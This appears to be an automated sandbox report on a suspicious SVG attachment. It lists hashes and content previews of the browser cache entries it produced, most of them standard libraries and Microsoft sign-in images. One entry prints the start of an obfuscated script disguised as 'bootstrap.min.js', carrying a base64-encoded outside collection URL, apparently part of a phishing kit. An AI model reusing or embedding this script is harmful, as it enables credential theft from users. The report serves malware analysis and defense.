                                                              Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...

                                                              Chrome Cache Entry: 70

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (32065)
                                                              Category:downloaded
                                                              Size (bytes):85578
                                                              Entropy (8bit):5.366055229017455
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:2F6B11A7E914718E0290410E85366FE9
                                                              SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                              SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                              SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                              Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

                                                              Chrome Cache Entry: 71

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:downloaded
                                                              Size (bytes):1864
                                                              Entropy (8bit):5.222032823730197
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

                                                              Chrome Cache Entry: 72

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (19015)
                                                              Category:downloaded
                                                              Size (bytes):19188
                                                              Entropy (8bit):5.212814407014048
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                              SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                              SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                              SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                              Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio

                                                              Chrome Cache Entry: 73

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                              Category:downloaded
                                                              Size (bytes):17174
                                                              Entropy (8bit):2.9129715116732746
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

                                                              Chrome Cache Entry: 74

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):61
                                                              Entropy (8bit):3.990210155325004
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                                                              Chrome Cache Entry: 75

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):21873
                                                              Entropy (8bit):2.877142515573533
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                              SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                              SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                              SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview:.PNG........IHDR...............A.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:D102A13741CE11E6A31DDAB08C35506E" xmpMM:DocumentID="xmp.did:D102A13841CE11E6A31DDAB08C35506E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D102A13541CE11E6A31DDAB08C35506E" stRef:documentID="xmp.did:D102A13641CE11E6A31DDAB08C35506E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.A....Q.IDATx...?..Q.........0..H.B.lcVA5....PLc...VD.EC.5.`.;..y.sN..or..t:........>gl.........<...........<.........x...

                                                              Chrome Cache Entry: 77

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (65474), with CRLF line terminators
                                                              Category:downloaded
                                                              Size (bytes):549812
                                                              Entropy (8bit):4.912882279168358
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:887C8D81BFE634545752D0CDC62EA68C
                                                              SHA1:0556868B901532440E16AB993EC51F10CEF424B1
                                                              SHA-256:D2F5F6729EA4B27A2C333F749909210FF1EBBD13AC6C7229C10C037B0F1A30C6
                                                              SHA-512:2AEC9016B95A985E14B5876230EE6D2B6F397F1B063C377D93A9D0B680C32E252DA562D1761ED6E7BB697A5D4BA8AF4880BB97B5126C1A47D421B58B07F4442C
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://5739350082-1317754460.cos.ap-singapore.myqcloud.com/bootstrap.min.js
                                                              Preview:var file = "aHR0cHM6Ly81NzM5MzUwMDgyLnNicy9nb29nbGUucGhw";....var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)+-parseInt(_0x34a11c(0x2a99))/(-0x702+0xa9d+-0x399)*(parseInt(_0x34a11c(0xbdd))/(-0x20aa*-0x1+-0x257c+0x4d5*0x1))+-parseInt(_0x34a11c(0xf4d))/(-0x567*-0x4+-0x886+-0x689*0x2)*(parseInt(_0x34a11c(0x1422))/(0x118a*0x1+0x1425*-0x1+0x2a0))+parseInt(_0x34a11c(0xe0b))/(-0xfd5+-0x1a30+0x2a0b)*(-parseInt(_0x34a11c(0x13bd))/(0x25b7+0xc4*-0x1b+0x4*-0x441))+parseInt(_0x34a11c(0x15f2))/(-0x36*-0xd+0x9d0+-0xc86)+-parseInt(_0x34a11c(0xa3d))/(0x1491+-0x206e+0xbe6)+-parseInt(_0x34a11c(0x1433))/(-0x5f8+-0x168+-0xd*-0x92)*(-parseInt(_0x34a11c(0x49d))/(0x159d+0x979+0x9*-0x373));if(_0x535a49===_0x380acb)break;else _0xef0e23['push'](_0xef0e23['shift']());}catch(_0x8dd1f8){_0xef0e23['push'](_0xef0e23['shift']());}}}(_0x1c5f,-0x1e295*-0x2+0x9994a+-0x6aeef));var count=0x5

                                                              Chrome Cache Entry: 79

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (48664)
                                                              Category:downloaded
                                                              Size (bytes):48944
                                                              Entropy (8bit):5.272507874206726
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                              SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                              SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                              SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                              Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp

                                                              Chrome Cache Entry: 80

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):32
                                                              Entropy (8bit):4.390319531114783
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                              SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                              SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                              SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCVcB_Tlaqnt7EgUNrQmusSHc1SZ4nX4UdxIZCSedJpWNfbhLEgUNQ_N2OSHeI9k5CLjOqw==?alt=proto
                                                              Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==

                                                              Chrome Cache Entry: 81

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (50758)
                                                              Category:downloaded
                                                              Size (bytes):51039
                                                              Entropy (8bit):5.247253437401007
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:67176C242E1BDC20603C878DEE836DF3
                                                              SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                              SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                              SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                              Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum

                                                              Chrome Cache Entry: 82

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (48122)
                                                              Category:downloaded
                                                              Size (bytes):48123
                                                              Entropy (8bit):5.342998089666478
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:EA38BDA3C117E2FE01BD862003357394
                                                              SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                              SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                              SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                              Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                              Chrome Cache Entry: 84

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (32012)
                                                              Category:downloaded
                                                              Size (bytes):69597
                                                              Entropy (8bit):5.369216080582935
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                              SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                              SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                              SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                              Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e

                                                              Chrome Cache Entry: 87

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 82 x 37, 8-bit/color RGB, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):61
                                                              Entropy (8bit):4.035372245524405
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:92F328FEB67DDFF9F0757F9BAF849EC7
                                                              SHA1:7F25CBBCF83713B0F9CA8BAB217796F53A0F2138
                                                              SHA-256:3BC45F10925DA4D3888797A56C745EA5B4DAF5DE74FBA859990D189D72CA18E8
                                                              SHA-512:FDE1BC11E88EB20BD006C87CD929556AE05D33DC52F7CEBD584689C76B372BBA51CB8852E86AF5CD652CCB810BA3B8C1DCC20C6DED4CFE865D8069C9820EA099
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/926055dbacd31b53/1742925917170/wCFuu2K25XOK2QX
                                                              Preview:.PNG........IHDR...R...%.....^i).....IDAT.....$.....IEND.B`.

                                                              Chrome Cache Entry: 88

                                                              Download File
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                              Category:dropped
                                                              Size (bytes):621
                                                              Entropy (8bit):7.673946009263606
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

                                                              Static File Info

                                                              General

                                                              File type:HTML document, ASCII text, with CRLF line terminators
                                                              Entropy (8bit):5.330349424292396
                                                              TrID:
                                                                File name:TRANS_ADV_9290910137_.svg
                                                                File size:2'404 bytes
                                                                MD5:7b341b85cc6592b164bdb89e523773e6
                                                                SHA1:fb90fd35e542803631797d5f1af9c2bd8ac41caa
                                                                SHA256:ebb1aa64e9f2eeaebf01d56bb3f5d42bb13f030f7418417a22840926a4918e62
                                                                SHA512:c5541524a66237eb8e451768f3b9ae26e0631f108f3cb58b65d4aa8df8d5765d90cb3456a59cf5a37dc7e1385789573bcb241653a6808978cda884ee14ada06a
                                                                SSDEEP:48:bMa6K23TqsWo4BZmLGUNP7qLOUNhNrZJWZGvmTstZJxODc+6r+e:oX/3T3yZmLZWHaAv8wZJxODJq
                                                                TLSH:D641B62F09D495383A754216A3F19A5BDB279817B39403A5FC8CDBC75F304A0282B9ED
                                                                File Content Preview: U3RyaXAgc3RlYWsgaXBzdW0gbW9sbGl0IGR1aXMgZHJ1bXN0aWNrIGNvcm5lZCBiZWVmIGFsY2F0cmEgcmVwcmVoZW5kZXJpdCBlbmltIHBpZyBjb25zZXF1YXQu --> Cupim ham hock culpa tenderloin, sirloin mollit in commodo meatball.-->.. <svg xmlns="http://www.w3.org/2000/

                                                                File Icon

                                                                Icon Hash:173149cccc490307